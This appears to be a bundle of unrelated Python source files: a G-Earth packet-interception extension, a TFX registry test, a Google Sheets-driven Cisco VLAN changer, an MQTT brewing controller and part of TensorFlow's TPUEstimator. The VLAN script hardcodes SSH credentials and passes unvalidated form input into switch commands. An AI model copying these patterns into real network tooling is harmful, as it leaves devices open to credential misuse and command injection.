name = name if name != 'NULL' else None
hash = hash if hash != 'NULL' else None
structure = structure if structure != 'NULL' else None
elem = {'Id': headerId, 'Name': name, 'Hash': hash, 'Structure': structure, 'Source': source}
packet_dict = outgoing if isOutgoing else incoming
if headerId not in packet_dict:
packet_dict[headerId] = []
packet_dict[headerId].append(elem)
if hash is not None:
if hash not in packet_dict:
packet_dict[hash] = []
packet_dict[hash].append(elem)
if name is not None:
if name not in packet_dict:
packet_dict[name] = []
packet_dict[name].append(elem)
self.packet_infos = {Direction.TO_CLIENT: incoming, Direction.TO_SERVER: outgoing}
def __send_to_stream(self, packet):
self.__stream_lock.acquire()
self.__sock.send(packet.bytearray)
self.__stream_lock.release()
def __callbacks(self, callbacks):
for func in callbacks:
func()
def __raise_event(self, event_name):
if event_name in self.__events:
t = threading.Thread(target=self.__callbacks, args=(self.__events[event_name],))
t.start()
def __send(self, direction, packet: HPacket):
if not self.is_closed():
old_settings = None
if packet.is_incomplete_packet():
old_settings = (packet.header_id(), packet.is_edited, packet.incomplete_identifier)
packet.fill_id(direction, self)
if self.connection_info is None:
self.__lost_packets += 1
print("Could not send packet because G-Earth isn't connected to a client", file=sys.stderr)
return False
if packet.is_corrupted():
self.__lost_packets += 1
print('Could not send corrupted packet', file=sys.stderr)
return False
if packet.is_incomplete_packet():
self.__lost_packets += 1
print('Could not send incomplete packet', file=sys.stderr)
return False
wrapper_packet = HPacket(OUTGOING_MESSAGES.SEND_MESSAGE.value, direction == Direction.TO_SERVER,
len(packet.bytearray), bytes(packet.bytearray))
self.__send_to_stream(wrapper_packet)
if old_settings is not None:
packet.replace_short(4, old_settings[0])
packet.incomplete_identifier = old_settings[2]
packet.is_edited = old_settings[1]
return True
else:
self.__lost_packets += 1
return False
def is_closed(self):
"""
:return: True if the extension is not connected to G-Earth
"""
return self.__sock is None or self.__sock.fileno() == -1
def send_to_client(self, packet):
"""
Sends a message to the client
:param packet: a HPacket() or a string representation
"""
if type(packet) is str:
packet = self.string_to_packet(packet)
self.__send(Direction.TO_CLIENT, packet)
def send_to_server(self, packet):
"""
Sends a message to the server
:param packet: a HPacket() or a string representation
"""
if type(packet) is str:
packet = self.string_to_packet(packet)
self.__send(Direction.TO_SERVER, packet)
def on_event(self, event_name: str, func):
"""
Implemented event names: double_click, connection_start, connection_end, init.
When the event occurs, every registered "func" is called back.
"""
if event_name in self.__events:
self.__events[event_name].append(func)
else:
self.__events[event_name] = [func]
def intercept(self, direction: Direction, callback, id=-1, mode='default'):
"""
:param direction: Direction.TO_CLIENT or Direction.TO_SERVER
:param callback: function that takes HMessage as an argument
:param id: header_id / hash / name
:param mode: can be: * default (blocking)
* async (async, can't modify packet, doesn't disturb packet flow)
* async_modify (async, can modify, doesn't block other packets, disturbs packet flow)
:return:
"""
original_callback = callback
if mode == 'async':
def new_callback(hmessage : HMessage):
copy = HMessage(hmessage.packet, hmessage.direction, hmessage._index, hmessage.is_blocked)
t = threading.Thread(target=original_callback, args=[copy])
t.start()
callback = new_callback
if mode == 'async_modify':
def callback_send(hmessage : HMessage):
original_callback(hmessage)
if not hmessage.is_blocked:
self.__send(hmessage.direction, hmessage.packet)
def new_callback(hmessage : HMessage):
hmessage.is_blocked = True
copy = HMessage(hmessage.packet, hmessage.direction, hmessage._index, False)
t = threading.Thread(target=callback_send, args=[copy])
t.start()
callback = new_callback
if id not in self.__intercept_listeners[direction]:
self.__intercept_listeners[direction][id] = []
self.__intercept_listeners[direction][id].append(callback)
def start(self):
"""
Tries to set up a connection with G-Earth
"""
self.__start_lock.acquire()
if self.is_closed():
self.__sock = socket.socket()
self.__sock.connect(("127.0.0.1", self.__port))
self.__sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
t = threading.Thread(target=self.__connection_thread)
t.start()
self.__start_barrier.wait()
else:
self.__start_lock.release()
raise Exception("Attempted to run already-running extension")
self.__start_lock.release()
def stop(self):
"""
Aborts an existing connection with G-Earth
"""
if not self.is_closed():
self.__sock.close()
else:
raise Exception("Attempted to close extension that wasn't running")
def write_to_console(self, text, color='black', mention_title=True):
"""
Writes a message to the G-Earth console
"""
message = '[{}]{}{}'.format(color, (self._extension_info['title'] + ' --> ') if mention_title else '', text)
packet = HPacket(OUTGOING_MESSAGES.EXTENSION_CONSOLE_LOG.value, message)
self.__send_to_stream(packet)
def __await_response(self, request):
self.__request_lock.acquire()
self.__send_to_stream(request)
self.__response_barrier.wait()
result = self.__response
self.__response = None
self.__request_lock.release()
return result
def packet_to_string(self, packet: HPacket):
request = HPacket(OUTGOING_MESSAGES.PACKET_TO_STRING_REQUEST.value)
request.append_string(repr(packet), 4, 'iso-8859-1')
return self.__await_response(request)[0]
def packet_to_expression(self, packet: HPacket):
request = HPacket(OUTGOING_MESSAGES.PACKET_TO_STRING_REQUEST.value)
request.append_string(repr(packet), 4, 'iso-8859-1')
return self.__await_response(request)[1]
def string_to_packet(self, string):
request = HPacket(OUTGOING_MESSAGES.STRING_TO_PACKET_REQUEST.value)
request.append_string(string, 4)
return self.__await_response(request)
def request_flags(self):
return self.__await_response(HPacket(OUTGOING_MESSAGES.REQUEST_FLAGS.value))
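# Minimal usage sketch (hedged example; the extension_info values and the callback
# below are made up for illustration):
#
#   ext = Extension({'title': 'Demo', 'description': 'example', 'version': '1.0',
#                    'author': 'me'}, sys.argv)
#   ext.intercept(Direction.TO_SERVER, lambda message: print(message.packet))
#   ext.start()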
|
node_registry_test.py
|
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.dsl.components.base.node_registry."""
import threading
from typing import Any, Dict, Text
import tensorflow as tf
from tfx.dsl.components.base import base_node
from tfx.dsl.components.base import node_registry
class _FakeNode(base_node.BaseNode):
@property
def inputs(self) -> Dict[Text, Any]:
return {}
@property
def outputs(self) -> Dict[Text, Any]:
return {}
@property
def exec_properties(self) -> Dict[str, Any]:
return {}
class NodeRegistryTest(tf.test.TestCase):
def testNodeRegistrySingleThread(self):
thread_name = threading.current_thread().name
self.assertSetEqual(node_registry.registered_nodes(), set())
unused_node1 = _FakeNode().with_id(f'node1_{thread_name}')
registered_node_names = {
node.id for node in node_registry.registered_nodes()
}
self.assertSetEqual(registered_node_names, {f'node1_{thread_name}'})
unused_node2 = _FakeNode().with_id(f'node2_{thread_name}')
registered_node_names = {
node.id for node in node_registry.registered_nodes()
}
self.assertSetEqual(registered_node_names,
{f'node1_{thread_name}', f'node2_{thread_name}'})
def testNodeRegistryMultiThread(self):
threads = [
threading.Thread(target=self.testNodeRegistrySingleThread)
for i in range(10)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
tf.test.main()
|
VLAN Changer Git.py
|
#!/usr/bin/python3.6
from __future__ import print_function
from googleapiclient.discovery import build
from googleapiclient import errors
from httplib2 import Http
from oauth2client import file, client, tools
from pytz import timezone
from datetime import datetime
from re import match
from netmiko import ConnectHandler, ssh_exception
from email.mime.text import MIMEText
import base64
import time
import threading
import queue
# If modifying these scopes, delete the file token.json.
SCOPES_SHEETS = 'https://www.googleapis.com/auth/spreadsheets'
SCOPES_GMAIL = 'https://www.googleapis.com/auth/gmail.send'
# The ID and range of the VLAN Change Request Form results spreadsheet.
SPREADSHEET_ID = 'yourSheetID'
RANGE_NAME = 'A2:I'
# List of people to receive notifications for failed attempts
EMAILS = ['netadminsemails@gmail.com']
# Maximum number of connections allowed at one time
MAX_THREADS = 5
# Job queue for new submissions (not a constant)
q = queue.Queue()
# Sleep time in seconds
seconds = 10
# TODO: Edit with appropriate VLAN IDs
VLAN_DICT = {
'Management': 1,
'Food Services': 2,
'UPS': 3,
'Copiers': 4,
'Printers': 5,
'Cameras': 6,
'Air Con': 7,
'DATA': 8,
'Administrator': 9,
'vBrick': 10,
'Servers': 11,
'Wireless': 12,
}
def main():
"""
Reads through submitted responses making changes on new entries.
:return: None
"""
while True:
service_sheets = get_google_service('sheets', 'v4', 'token_sheets.json', SCOPES_SHEETS)
result = service_sheets.spreadsheets().values().get(spreadsheetId=SPREADSHEET_ID,
range=RANGE_NAME).execute()
values = result.get('values', [])
new_data_found = False
if values:
current_row = 2
global q
q = queue.Queue()
threads = []
for data in values:
try:
status = data[6]
if status == 'Authentication Failure' \
or status == 'Connection Timeout':
new_data_found = True
q.put((data, current_row))
except IndexError:
new_data_found = True
q.put((data, current_row))
current_row += 1
if new_data_found:
num_workers = q.qsize() if q.qsize() < MAX_THREADS else MAX_THREADS
print('num workers:', num_workers)
for i in range(num_workers):
thread_name = 'thread {}'.format(i)
t = threading.Thread(target=worker, name=thread_name, daemon=True)
t.start()
threads.append(t)
print('workers created')
print('queue size: ', q.qsize())
q.join()
for i in range(num_workers):
q.put(None)
for t in threads:
t.join()
print('workers killed')
print('queue size: ', q.qsize())
if not new_data_found:
print('sleeping')
time.sleep(seconds)
def worker():
"""
Creates a worker/thread. Changes vlans until no jobs are left in the queue.
:return: None
"""
service_gmail = get_google_service('gmail', 'v1', 'token_gmail.json', SCOPES_GMAIL)
service_sheets = get_google_service('sheets', 'v4', 'token_sheets.json', SCOPES_SHEETS)
while True:
data = q.get()
if data is None:
print('Worker freed')
break
print('Worker assigned new job')
device_type = get_system_type(ip=data[0][3])
current_row = data[1]
change_vlan(data[0], device_type, current_row, service_sheets, service_gmail)
q.task_done()
print('worker finished job')
def get_google_service(type, version, token, scope):
"""
Builds and returns a google service.
:param type: String - Type of service to build, either 'gmail' or 'sheets'
:param version: String - Service version e.g. 'v1' 'v4'
:param token: String - Name of token file to create
:param scope: String - Scope of the service i.e. permissions
:return: googleapiclient.discovery.Resource
"""
store = file.Storage(token)
creds = store.get()
if not creds or creds.invalid:
flow = client.flow_from_clientsecrets('credentials.json', scope)
creds = tools.run_flow(flow, store)
return build(type, version, http=creds.authorize(Http()))
def create_message(form_data, status, to=', '.join(EMAILS), subject='VLAN change fail'):
"""
Creates and returns a message.
:param form_data: List - Submitted responses
:param status: String - Status to include in the message body
:param to: String - List of recipients
:param subject: String - Subject of the email
:return: Dict - Message
"""
message_text = str(form_data) + '\n\nStatus: ' + status
message = MIMEText(message_text)
message['to'] = to if len(EMAILS) > 1 else EMAILS[0]
message['from'] = ''
message['subject'] = subject
raw = base64.urlsafe_b64encode(message.as_bytes())
raw = raw.decode()
message = {'raw': raw}
return message
def send_email(service_gmail, message, user_id='me'):
"""
Sends an email
:param service_gmail: Authorized Gmail API service instance.
:param message: Message to be sent
:param user_id: User's email address. The special value "me"
can be used to indicate the authenticated user.
:return: None
"""
try:
message = (service_gmail.users().messages().send(userId=user_id, body=message)
.execute())
return message
except errors.HttpError as error:
print('An error occurred: %s' % error)
def update_sheet(range_to_edit, status, service_sheets, desired_vlan, current_vlan="\' \'"):
"""
Updates the status, change timestamp and vlan change details on the sheet
:param range_to_edit: String - Range of cells to be updated e.g. 'G2:I2'
:param status: String - New status e.g. 'Successful'
:param service_sheets: googleapiclient.discovery.Resource
:param desired_vlan: String - Desired VLAN according to submitted response
:param current_vlan: String - Current VLAN 'name, id'
:return: None
"""
change_info = current_vlan + ' >> ' + desired_vlan + ', ' + str(VLAN_DICT.get(desired_vlan))
new_status = {
'range': range_to_edit,
'majorDimension': 'ROWS',
'values': [[status, get_time(), change_info]]
}
request = service_sheets.spreadsheets().values().update(
spreadsheetId=SPREADSHEET_ID, range=range_to_edit,
valueInputOption='USER_ENTERED', body=new_status)
request.execute()
def get_time():
"""
Returns a String representation of the current time
:return: String - Month/Day/Year HH:MM:SS
"""
tz = timezone('America/Chicago')
current_date, current_time = str(datetime.now(tz)).split('.', 1)[0].split(' ')
year, month, day = current_date.split('-')
month = month.lstrip('0')
day = day.lstrip('0')
formatted_date = '%s/%s/%s %s' % (month, day, year, current_time)
return formatted_date
def get_system_type(ip):
"""
FOR FUTURE USE.
If more than one OS is in use, ideally this function would read
from a file that lists IPs and OS types. In this case only cisco_ios
is in use.
:param ip: String - IP address of the device
:return: String - OS of the device
"""
return 'cisco_ios'
def change_vlan(form_data, device_type, current_row, service_sheets, service_gmail):
"""
:param form_data: List of data of the current row in the sheet
:param device_type: OS of the device e.g. cisco_ios
:param current_row: row in the google sheet
:param service_sheets: googleapiclient.discovery.Resource
:param service_gmail: googleapiclient.discovery.Resource
:return: None
"""
range_to_edit = 'G' + str(current_row) + ':I' + str(current_row)
desired_vlan = form_data[1]
status = 'Connecting...'
update_sheet(range_to_edit, status, service_sheets, desired_vlan)
if device_type == 'cisco_ios':
cisco_ios_change(form_data, range_to_edit, service_sheets, service_gmail)
elif device_type == 'some HP':
print()
# TODO: some HP function, Extreme etc
def cisco_ios_change(form_data, range_to_edit, service_sheets, service_gmail):
"""
Attempts an SSH connection to the switch.
Returns early (after emailing an alert) if the connection cannot be established.
Changes VLAN as needed, only saving if change is validated successfully.
:param form_data: List of data of the current row in the sheet
:param range_to_edit: String - Range of cells to be updated e.g. "G2:I2"
:param service_sheets: googleapiclient.discovery.Resource
:param service_gmail: googleapiclient.discovery.Resource
:return: None
"""
ip_address = form_data[3]
port = str(form_data[4]).replace(' ', '')
desired_vlan = form_data[1]
if port.upper()[0] == 'G':
port = port[:2] + port[15:]
else:
port = port[:2] + port[12:]
# adjust user/pass accordingly
cisco_ios_switch = {
'device_type': 'cisco_ios',
'ip': ip_address,
'username': 'oscar',
'password': 'cisco',
'port': 22, # optional, defaults to 22
'secret': '', # optional, defaults to ''
'verbose': False # optional, default to False
}
net_connect, status = get_connection(cisco_ios_switch)
update_sheet(range_to_edit, status, service_sheets, desired_vlan)
# Stops if a connection fails to be established
if status != 'Connection Established':
return send_email(service_gmail, message=create_message(form_data, status))
output = net_connect.send_command('show vlan br')
current_vlan = get_current_cisco_vlan(output, port)
current_vlan = current_vlan[0] + ', ' + current_vlan[1]
status = 'Attempting change...'
update_sheet(range_to_edit, status, service_sheets, desired_vlan, current_vlan)
# Stops if port is not access or port is not found (Should probably never happen)
if current_vlan == 'None, -1':
if is_trunk(net_connect.send_command('show int trunk'), port):
status = 'Port is trunk'
else:
status = 'Port not found'
update_sheet(range_to_edit, status, service_sheets, desired_vlan, current_vlan)
return send_email(service_gmail, message=create_message(form_data, status))
interface_cmd = 'interface ' + port
vlan_cmd = 'switchport access vlan ' + str(VLAN_DICT.get(desired_vlan))
net_connect.send_config_set([interface_cmd, vlan_cmd])
output = net_connect.send_command('show vlan br')
if validate_cisco(output, port, desired_vlan):
net_connect.save_config()
status = 'Successful'
send_email(service_gmail, message=create_message(form_data, status, to=form_data[5], subject='VLAN Changed'))
else:
status = 'Failed'
send_email(service_gmail, message=create_message(form_data, status))
net_connect.cleanup()
net_connect.disconnect()
update_sheet(range_to_edit, status, service_sheets, desired_vlan, current_vlan)
def get_connection(device):
"""
Returns a Connection to the device and a status message
:param device: Dict - holds device information
:return: Connection, String - Netmiko Connection if possible, Status
"""
net_connect = ''
try:
net_connect = ConnectHandler(**device)
status = 'Connection Established'
except ssh_exception.NetMikoAuthenticationException:
status = 'Authentication Failure'
except ssh_exception.NetMikoTimeoutException:
status = 'Connection Timeout'
return net_connect, status
def get_current_cisco_vlan(output, port):
"""
Returns the current VLAN assignment for a given interface.
Reads the output of "show vlan brief" line by line storing the last read
vlan ID and name. When the interface is found, the current stored
ID and name are returned. If no match is found, ('None', '-1') is returned.
:param output: String - Output of "show vlan brief"
:param port: String - Interface to be modified (e.g. Gi0/1 Fa0/1)
:return: String Tuple - (vlan NAME, vlan ID) e.g. (DATA, 8)
"""
for lines in output.strip().splitlines():
if match(r'\d{1,4}', lines[0:3].strip()):
vlan_id = lines[0:3].strip()
vlan_name = lines[5:37].strip()
if port in lines:
if vlan_name.upper() != 'VOICE':
return vlan_name, vlan_id
return 'None', '-1'
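# Illustrative sketch (added comment, not in the original script): with typical
# "show vlan brief" output, the parser above behaves roughly like this.
#
#   output = (
#       'VLAN Name                             Status    Ports\n'
#       '---- -------------------------------- --------- ------------------\n'
#       '8    DATA                             active    Gi0/1, Gi0/2\n'
#       '20   VOICE                            active    Gi0/1\n'
#   )
#   get_current_cisco_vlan(output, 'Gi0/2')   # -> ('DATA', '8')
#   get_current_cisco_vlan(output, 'Gi0/48')  # -> ('None', '-1')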
def validate_cisco(output, port, vlan):
"""
Returns True if current VLAN matches desired VLAN, False otherwise
:param output: String - Output of "show vlan brief"
:param port: String - Interface to be modified (e.g. Gi0/1 Fa0/1)
:param vlan: String - Desired VLAN according to submitted response
:return: Bool
"""
desired_vlan = str(VLAN_DICT.get(vlan))
if get_current_cisco_vlan(output, port)[1] == desired_vlan:
return True
return False
def is_trunk(output, port):
"""
Returns True if the port is a trunk, False otherwise
:param output: String - Output of 'show int trunk'
:param port: String - The port e.g. Gi0/1
:return: Bool
"""
for lines in output.strip().splitlines():
if port in lines:
return True
return False
if __name__ == '__main__':
main()
|
bcontrol.py
|
#!/usr/bin/python
# MIT License
# Copyright (c) 2018 Martin Klingensmith
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import struct, array, time, io, fcntl
import RPi.GPIO as GPIO
import sys
import paho.mqtt.subscribe as subscribe
import paho.mqtt.publish as publish
import threading
class bcontrol(object):
def __init__(self):
self.enable = 4
self.ch1 = 17
self.ch2 = 27
self.BIN = "{0:8b}"
self.htexch = 0.
self.mash_tun = 0.
self.hlt = 0.
self.pwm1 = 0.
self.pwm2 = 0.
self.rotenc_input = 0.
self.sub_topics = ["adc/1", "adc/2", "rotenc", "pwm1", "pwm2"]
self.th1 = threading.Thread(target=self.thread_sub, args=())
self.th1.daemon = True
self.th1.start()
def cb(self, client, userdata, message):
if message.topic == "adc/1":
self.mash_tun = float(message.payload.decode("utf-8"))
elif message.topic == "adc/2":
self.hlt = float(message.payload.decode("utf-8"))
elif message.topic == "rotenc":
inp = float(message.payload.decode("utf-8"))
print ("rotenc %2.0f" % inp)
self.rotenc_input = self.rotenc_input + inp
elif message.topic == "pwm1":
self.pwm1 = float(message.payload.decode("utf-8"))
elif message.topic == "pwm2":
self.pwm2 = float(message.payload.decode("utf-8"))
else:
print("%s %s" % (message.topic, message.payload.decode("utf-8")))
def thread_sub(self):
subscribe.callback(self.cb, self.sub_topics, qos=0, userdata=self, hostname="localhost")
def pid_set(self, setpoint):
publish.single("pid/set", "%2.2f" % setpoint, hostname="localhost")
def pwm2_set(self, setpoint):
setpoint = setpoint / 100.
if setpoint > 1.00:
setpoint = 1.00
if setpoint < 0.00:
setpoint = 0.0
publish.single("pwm2", "%2.2f" % setpoint, hostname="localhost")
def pid_set_sensor_source(self, sensortopic):
publish.single("sensortopic", sensortopic, hostname="localhost")
def enable_heater_hlt(self):
print("enable_heater_hlt")
def enable_heater_boil(self):
print("enable_heater_boil")
def disable_heaters(self):
print("disable_heaters")
# Convert PT100 resistance to temperature (Celsius)
# this equation works pretty well between 0C and 105C
# The error is less than 0.1 degree for most of that range.
def pt100_to_temperature(self,resistance):
try:
c=(resistance-100.1)/.3847
except:
c=None
return c
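# Illustrative check (added comment, not in the original file): a PT100 reads
# roughly 138.5 ohms at 100 C, and (138.5 - 100.1) / 0.3847 ~= 99.8 C, so the
# linear fit above stays within a fraction of a degree near the top of its
# stated 0-105 C range.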
def adc_to_voltage(self,lsb):
try:
volts=lsb*4.096/65536.
except:
volts=None
return volts
def celsius_to_f(self,c):
try:
f=c*9./5.+32.
except:
f=None
return f
def ohms_to_f(self,ohms):
return self.celsius_to_f(self.pt100_to_temperature(ohms))
def adc_to_f(self,lsb):
try:
f=self.celsius_to_f(self.pt100_to_temperature(self.adc_to_voltage(lsb)*1000.))
except:
f=None
return f
def init_temp_sensors(self):
pass
def read_temp_sensor(self):
adc1_ch0 = 1.0
adc1_ch1 = 1.1
rtd_0 = (adc1_ch0 - 2.0 * adc1_ch1)*1000.0
#self.mash_tun = 0 #self.ohms_to_f(rtd_0) + self.cal_mash_tun_sensor
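# Hedged usage sketch (added comment, not part of the original file): assuming a
# local MQTT broker is running, the controller could be driven like this.
#
#   if __name__ == '__main__':
#       bc = bcontrol()
#       bc.pid_set(152.0)   # setpoint (units depend on the PID topic consumer)
#       bc.pwm2_set(75)     # boil element at 75% duty
#       while True:
#           print("mash tun: %.1f  hlt: %.1f" % (bc.mash_tun, bc.hlt))
#           time.sleep(5)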
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import signal
import threading
import time
import traceback
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.summary import summary_ops as contrib_summary
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator import util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops():
# Gets the variables back from TPU nodes. This means the variables updated
# by TPU will now be *synced* to host memory.
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU
system before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# The Estimator evaluation loop increments the eval step by 1 per `Session.run`,
# so we add the remaining `iterations_per_loop - 1` here.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
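# Illustrative note (added comment): the infeed/outfeed worker queues carry either
# a positive iteration count or one of these signals; feeding, e.g., [100, 100, STOP]
# drives two loops of 100 enqueue/dequeue iterations and then shuts the thread down.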
class TPUEstimatorSpec(
collections.namedtuple('TPUEstimatorSpec', [
'mode',
'predictions',
'loss',
'train_op',
'eval_metrics',
'export_outputs',
'scaffold_fn',
'host_call'
])):
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
@{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for an MNIST example of how to specify
`eval_metrics`; a brief illustrative sketch also follows this class definition.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function; the function in turn returns a list of Tensors.
`host_call` currently works for train() and evaluate(). The function is executed
on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with @{tf.contrib.summary.create_file_writer}.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
